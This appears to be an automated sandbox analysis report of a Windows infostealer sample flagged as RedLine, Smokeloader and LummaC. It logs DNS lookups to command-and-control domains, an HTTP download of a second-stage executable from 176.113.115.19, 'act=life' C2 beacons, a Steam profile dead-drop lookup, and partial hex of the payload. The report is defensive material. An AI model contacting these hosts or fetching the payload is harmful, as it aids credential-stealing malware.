Dec 15, 2024 09:23:37.693054914 CET	53	65092	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 15, 2024 09:23:21.267877102 CET	192.168.2.4	1.1.1.1	0xad7e	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:29.942881107 CET	192.168.2.4	1.1.1.1	0xa771	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:30.089118004 CET	192.168.2.4	1.1.1.1	0x9ff1	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.671988964 CET	192.168.2.4	1.1.1.1	0x7826	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:36.608311892 CET	192.168.2.4	1.1.1.1	0x8f29	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:36.750710964 CET	192.168.2.4	1.1.1.1	0xb45c	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:36.892587900 CET	192.168.2.4	1.1.1.1	0x4e24	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.040754080 CET	192.168.2.4	1.1.1.1	0xe145	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.183845997 CET	192.168.2.4	1.1.1.1	0xa21a	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.326266050 CET	192.168.2.4	1.1.1.1	0xf921	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.470479012 CET	192.168.2.4	1.1.1.1	0x7247	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 15, 2024 09:23:21.408256054 CET	1.1.1.1	192.168.2.4	0xad7e	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:21.408256054 CET	1.1.1.1	192.168.2.4	0xad7e	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:30.080929995 CET	1.1.1.1	192.168.2.4	0xa771	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:30.227077007 CET	1.1.1.1	192.168.2.4	0x9ff1	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:30.227077007 CET	1.1.1.1	192.168.2.4	0x9ff1	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:33.809834957 CET	1.1.1.1	192.168.2.4	0x7826	No error (0)	deafeninggeh.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:36.746326923 CET	1.1.1.1	192.168.2.4	0x8f29	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:36.888850927 CET	1.1.1.1	192.168.2.4	0xb45c	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.033804893 CET	1.1.1.1	192.168.2.4	0x4e24	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.178563118 CET	1.1.1.1	192.168.2.4	0xe145	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.322361946 CET	1.1.1.1	192.168.2.4	0xa21a	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.463306904 CET	1.1.1.1	192.168.2.4	0xf921	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 09:23:37.693054914 CET	1.1.1.1	192.168.2.4	0x7247	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

immureprech.biz

deafeninggeh.biz

steamcommunity.com

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	176.113.115.19	80	2536	C:\Users\user\Desktop\wN8pQhRNnu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 09:23:23.734226942 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 15, 2024 09:23:25.079699993 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 08:23:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 15 Dec 2024 08:15:01 GMT ETag: "58600-6294aa91c6503" Accept-Ranges: bytes Content-Length: 361984 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
Dec 15, 2024 09:23:25.079740047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuuu9Et
Dec 15, 2024 09:23:25.079752922 CET	1236	IN	Data Raw: 56 e8 cc 30 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 40 a3 81 00 eb 05 b9 08 4c 44 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 40 a3 81 00 eb 05 b8 08 Data Ascii: V0Ytt@LDA$u)tt@LD@$tWWWWW%M9}uNxAV,YEEEuV5,YUQSVW5l5h}YY;+CrwW
Dec 15, 2024 09:23:25.079894066 CET	1236	IN	Data Raw: 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 40 44 00 5d c3 05 44 ff ff ff 6a 0e 59 3b c8 1b c0 23 c1 83 c0 08 5d c3 e8 4d 1c 00 00 85 c0 75 06 b8 78 41 44 00 c3 83 c0 08 c3 e8 3a 1c 00 00 85 c0 75 06 b8 7c 41 44 00 c3 83 c0 Data Ascii: -rHwjX]@D]DjY;#]MuxAD:u\|ADUVMQY0^]U39EjhPD4nDu]3@]VW38nD<ADuAD8h06YYtF$\|3@_^$AD3
Dec 15, 2024 09:23:25.079906940 CET	1236	IN	Data Raw: b4 81 00 a1 88 6f 44 00 ba 00 00 00 80 d3 ea 09 50 08 a1 88 6f 44 00 8b 40 10 8b 0d 90 b4 81 00 83 a4 88 c4 00 00 00 00 a1 88 6f 44 00 8b 40 10 fe 48 43 a1 88 6f 44 00 8b 48 10 80 79 43 00 75 09 83 60 04 fe a1 88 6f 44 00 83 78 08 ff 75 65 53 6a Data Ascii: oDPoD@oD@HCoDHyCu`oDxueSjpoDpj54nDD\|oDk+LQHQPy2E\|;oDvmEoD=[_^V5\|W3;u4kP5W54nD
Dec 15, 2024 09:23:25.079917908 CET	1236	IN	Data Raw: 76 03 6a 3f 5e 8b 4d f4 8d 0c f1 8b 79 04 89 4b 08 89 7b 04 89 59 04 8b 4b 04 89 59 08 8b 4b 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb Data Ascii: vj?^MyK{YKYK;KuWLML s}uM9DD }uNMyNED3@_^[U\|MkMSI VW}M3US;#U#u];
Dec 15, 2024 09:23:25.079931021 CET	1236	IN	Data Raw: 00 83 c4 04 85 c0 74 0f 8b 55 08 6a 01 52 ff 15 78 b4 81 00 83 c4 08 8b 4d 0c e8 cf 2d 00 00 8b 45 0c 39 58 0c 74 12 68 04 40 44 00 57 8b d3 8b c8 e8 d2 2d 00 00 8b 45 0c 8b 4d f8 89 48 0c 8b 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 e7 ff Data Ascii: tUjRxM-E9Xth@DW-EMHtN38NV3:EHe-9SRh@DW}-jh&DM3;v.jX3;E@uWWWWW3Mu;u3F3]wi=
Dec 15, 2024 09:23:25.080125093 CET	1236	IN	Data Raw: 8b 40 04 c7 05 8c 6f 44 00 01 00 00 00 eb c4 38 5d fc 74 07 8b 45 f8 83 60 70 fd 8b c6 5b c9 c3 8b ff 55 8b ec 83 ec 20 a1 04 40 44 00 33 c5 89 45 fc 53 8b 5d 0c 56 8b 75 08 57 e8 64 ff ff ff 8b f8 33 f6 89 7d 08 3b fe 75 0e 8b c3 e8 b7 fc ff ff Data Ascii: @oD8]tE`p[U @D3ES]VuWd3};u3u39FDE0=rpdPDREPWD3hCVP)3B{s9U}uF
Dec 15, 2024 09:23:25.080173969 CET	1236	IN	Data Raw: 50 e8 6b de ff ff 59 39 5f fc 74 12 8b 47 04 3b c3 74 0b 39 18 75 07 50 e8 54 de ff ff 59 83 c7 10 ff 4d 08 75 c7 56 e8 45 de ff ff 59 5f 5e 5b 5d c3 8b ff 55 8b ec 53 56 8b 35 14 10 44 00 57 8b 7d 08 57 ff d6 8b 87 b0 00 00 00 85 c0 74 03 50 ff Data Ascii: PkY9_tG;t9uPTYMuVEY_^[]USV5DW}WtPtPtPtP_PE{GDttP{tCtPMuP_^[]UW}SV5DWtPt
Dec 15, 2024 09:23:25.080185890 CET	1236	IN	Data Raw: c3 8b ff 56 e8 7f ff ff ff 8b f0 85 f6 75 08 6a 10 e8 99 04 00 00 59 8b c6 5e c3 6a 08 68 c0 26 44 00 e8 fd ef ff ff 8b 75 08 85 f6 0f 84 f8 00 00 00 8b 46 24 85 c0 74 07 50 e8 5e d9 ff ff 59 8b 46 2c 85 c0 74 07 50 e8 50 d9 ff ff 59 8b 46 34 85 Data Ascii: VujY^jh&DuF$tP^YF,tPPYF4tPBYF<tP4YF@tP&YFDtPYFHtPYF\=DtPYjYe~htWDuBDtWYEWjFYE~lt
Dec 15, 2024 09:23:25.199821949 CET	1236	IN	Data Raw: c4 0c 5d c3 8b ff 55 8b ec 68 d8 12 44 00 ff 15 24 10 44 00 85 c0 74 15 68 c8 12 44 00 50 ff 15 48 10 44 00 85 c0 74 05 ff 75 08 ff d0 5d c3 8b ff 55 8b ec ff 75 08 e8 c8 ff ff ff 59 ff 75 08 ff 15 08 11 44 00 cc 6a 08 e8 09 e0 ff ff 59 c3 6a 08 Data Ascii: ]UhD$DthDPHDtu]UuYuDjYj&YUVt;ur^]UVu3ut;ur^]U=`$Dth`$DYtu`$DY*hDhDYYuBh,P@WD$Dc

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.179.207	443	2536	C:\Users\user\Desktop\wN8pQhRNnu.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 08:23:22 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-15 08:23:23 UTC	802	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 08:23:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4a8QlBfNg1k%2FV1kJZv%2BN4ATQJmsinxMGVAL2PofrldRr6oJ6XmRqm%2FPWcT4VaWm91WdOSzGB0dfgEQL0fHb5OHiC2CHTRN9OPUeRB1lpyuzZtlMUG%2FcI8t8hEecz6XF5xQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f250800ea3e43e8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1575&rtt_var=624&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1706604&cwnd=214&unsent_bytes=0&cid=6fd50f93b84d22f0&ts=706&x=0"
2024-12-15 08:23:23 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-15 08:23:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.22.222	443	5660	C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 08:23:31 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-15 08:23:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-15 08:23:33 UTC	1015	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 08:23:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=viku328juiighvum0sdvsql7ep; expires=Thu, 10-Apr-2025 02:10:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfbPvL9dmLvSmYxI1WieS9MK03M4itvd%2FFjt2CFkSxY29fvkZ%2BlTFbzI1VsMLZQXlSQ6FLzE0on3dGgI4nqb%2BjENhL34kWnVLnXA0WbjdYAEJyR%2BDBaaZgWD%2BIJG5lhuD28%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2508390a754285-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1851&min_rtt=1805&rtt_var=770&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1340679&cwnd=32&unsent_bytes=0&cid=8ece715343b9ecac&ts=2211&x=0"
2024-12-15 08:23:33 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-15 08:23:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.16.1	443	5660	C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 08:23:35 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-15 08:23:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-15 08:23:36 UTC	1026	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 08:23:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d5pbdb4pblc35hicrbsndv84lv; expires=Thu, 10-Apr-2025 02:10:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2B4Ibc1Z6rwZmFBJuvt1trXrGQtuUVuPH%2FcUx%2BB7KZZWXYwoF7QrgB%2Ft8kz%2Fj9ciguPnmJ%2F6ppPuCMOq%2B8Pqgq3hYmVN%2FqsrkcOCXl5WebQLpBa%2BflCUf%2BdyPPDIJS8ir5h%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f25084dcf027293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1944&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1461461&cwnd=158&unsent_bytes=0&cid=f416ca7bec9fb78a&ts=1543&x=0"
2024-12-15 08:23:36 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-15 08:23:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	23.55.153.106	443	5660	C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 08:23:39 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-15 08:23:39 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 15 Dec 2024 08:23:39 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=441f5f15ce21037eb22fdf8f; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-15 08:23:39 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-15 08:23:40 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-15 08:23:40 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Target ID:	0
Start time:	03:23:17
Start date:	15/12/2024
Path:	C:\Users\user\Desktop\wN8pQhRNnu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wN8pQhRNnu.exe"
Imagebase:	0x400000
File size:	429'568 bytes
MD5 hash:	1C8D14491C1D595F460AD1B654A10571
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	03:23:26
Start date:	15/12/2024
Path:	C:\Users\user\AppData\Local\Temp\5759.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\5759.tmp.exe"
Imagebase:	0x400000
File size:	361'984 bytes
MD5 hash:	D88E2431ABAC06BDF0CD03C034B3E5E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1793934788.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2124427014.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:23:40
Start date:	15/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 1892
Imagebase:	0x7d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	5.8%
Total number of Nodes:	737
Total number of Limit Nodes:	21

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

